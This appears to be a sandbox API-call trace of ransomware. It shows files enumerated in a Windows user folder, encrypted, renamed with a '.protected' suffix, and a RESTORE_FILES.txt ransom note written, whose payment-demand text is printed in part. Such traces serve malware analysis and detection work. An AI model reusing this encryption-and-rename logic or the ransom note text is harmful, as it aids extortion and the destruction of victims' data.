[0094.933] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0094.933] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.933] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0094.933] CloseHandle (hObject=0x154) returned 1 [0094.933] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0094.933] lstrcmpiW (lpString1="TaskBar", lpString2="Windows") returned -1 [0094.933] lstrcmpiW (lpString1="TaskBar", lpString2="Program Files") returned 1 [0094.933] lstrcmpiW (lpString1="TaskBar", lpString2="Program Files (x86)") returned 1 [0094.933] lstrcmpiW (lpString1="TaskBar", lpString2="$Recycle.bin") returned 1 [0094.933] lstrcmpiW (lpString1="TaskBar", lpString2="System Volume Information") returned 1 [0094.933] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned 97 [0094.933] lstrcmpW (lpString1="TaskBar", lpString2=".") returned 1 [0094.933] lstrcmpW (lpString1="TaskBar", lpString2="..") returned 1 [0094.933] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*") returned 99 [0094.933] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0094.982] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.982] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.982] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.982] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.982] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.982] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\.") returned 99 [0094.982] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.982] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0094.982] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0094.982] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0094.982] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0094.982] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.982] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0094.982] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.982] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.982] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.982] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.982] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.982] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\..") returned 100 [0094.983] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.983] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.983] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0094.983] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0094.983] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0094.983] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0094.983] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.983] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0094.983] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0094.983] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0094.983] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0094.983] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0094.983] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0094.983] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 109 [0094.983] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0094.983] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0094.983] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0094.983] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0094.983] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0094.984] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 109 [0094.984] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0094.984] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 109 [0094.984] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0094.984] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 109 [0094.984] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0094.984] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0xd3, lpOverlapped=0x0) returned 1 [0094.985] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff2d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.985] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0xd3, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0xd3, lpOverlapped=0x0) returned 1 [0094.985] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.985] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0094.985] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0094.986] CloseHandle (hObject=0x158) returned 1 [0094.986] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini.protected") returned 119 [0094.986] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini.protected" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini.protected")) returned 1 [0094.987] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0094.987] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="Windows") returned -1 [0094.987] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="Program Files") returned -1 [0094.987] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="Program Files (x86)") returned -1 [0094.987] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="$Recycle.bin") returned 1 [0094.987] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="System Volume Information") returned -1 [0094.987] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk") returned 119 [0094.987] StrStrIW (lpFirst="Internet Explorer.lnk", lpSrch=".protected") returned 0x0 [0094.987] lstrcmpW (lpString1="Internet Explorer.lnk", lpString2="RESTORE_FILES.txt") returned -1 [0094.987] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0094.987] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0094.987] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0094.987] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk") returned 119 [0094.987] StrStrW (lpFirst="Internet Explorer.lnk", lpSrch=".txt") returned 0x0 [0094.987] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk") returned 119 [0094.987] StrStrW (lpFirst="Internet Explorer.lnk", lpSrch=".rar") returned 0x0 [0094.988] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk") returned 119 [0094.988] StrStrW (lpFirst="Internet Explorer.lnk", lpSrch=".zip") returned 0x0 [0094.988] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x5a9, lpOverlapped=0x0) returned 1 [0094.989] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffa57, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.989] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x5a9, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x5a9, lpOverlapped=0x0) returned 1 [0094.989] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.990] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0094.990] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0094.990] CloseHandle (hObject=0x158) returned 1 [0094.990] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk.protected") returned 129 [0094.990] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk.protected" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk.protected")) returned 1 [0094.991] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0094.991] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="Windows") returned 1 [0094.991] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="Program Files") returned 1 [0094.991] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="Program Files (x86)") returned 1 [0094.991] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="$Recycle.bin") returned 1 [0094.991] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="System Volume Information") returned 1 [0094.991] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk") returned 118 [0094.991] StrStrIW (lpFirst="Windows Explorer.lnk", lpSrch=".protected") returned 0x0 [0094.991] lstrcmpW (lpString1="Windows Explorer.lnk", lpString2="RESTORE_FILES.txt") returned 1 [0094.991] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0094.991] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0094.991] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0094.991] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk") returned 118 [0094.991] StrStrW (lpFirst="Windows Explorer.lnk", lpSrch=".txt") returned 0x0 [0094.991] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk") returned 118 [0094.991] StrStrW (lpFirst="Windows Explorer.lnk", lpSrch=".rar") returned 0x0 [0094.991] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk") returned 118 [0094.991] StrStrW (lpFirst="Windows Explorer.lnk", lpSrch=".zip") returned 0x0 [0094.991] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x4cc, lpOverlapped=0x0) returned 1 [0094.993] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffb34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.993] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x4cc, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x4cc, lpOverlapped=0x0) returned 1 [0094.993] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.993] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0094.993] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0094.993] CloseHandle (hObject=0x158) returned 1 [0094.993] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk.protected") returned 128 [0094.993] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk.protected" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk.protected")) returned 1 [0094.994] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0094.994] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="Windows") returned 1 [0094.994] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="Program Files") returned 1 [0094.994] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="Program Files (x86)") returned 1 [0094.994] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="$Recycle.bin") returned 1 [0094.994] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="System Volume Information") returned 1 [0094.994] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk") returned 122 [0094.994] StrStrIW (lpFirst="Windows Media Player.lnk", lpSrch=".protected") returned 0x0 [0094.994] lstrcmpW (lpString1="Windows Media Player.lnk", lpString2="RESTORE_FILES.txt") returned 1 [0094.994] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0094.994] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0094.994] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0094.994] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk") returned 122 [0094.994] StrStrW (lpFirst="Windows Media Player.lnk", lpSrch=".txt") returned 0x0 [0094.995] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk") returned 122 [0094.995] StrStrW (lpFirst="Windows Media Player.lnk", lpSrch=".rar") returned 0x0 [0094.995] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk") returned 122 [0094.995] StrStrW (lpFirst="Windows Media Player.lnk", lpSrch=".zip") returned 0x0 [0094.995] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x60b, lpOverlapped=0x0) returned 1 [0094.999] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff9f5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.999] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x60b, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x60b, lpOverlapped=0x0) returned 1 [0094.999] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.999] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0094.999] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0094.999] CloseHandle (hObject=0x158) returned 1 [0094.999] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk.protected") returned 132 [0094.999] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk.protected" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk.protected")) returned 1 [0095.000] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0095.000] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0095.000] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\RESTORE_FILES.txt") returned 115 [0095.000] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0095.001] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% 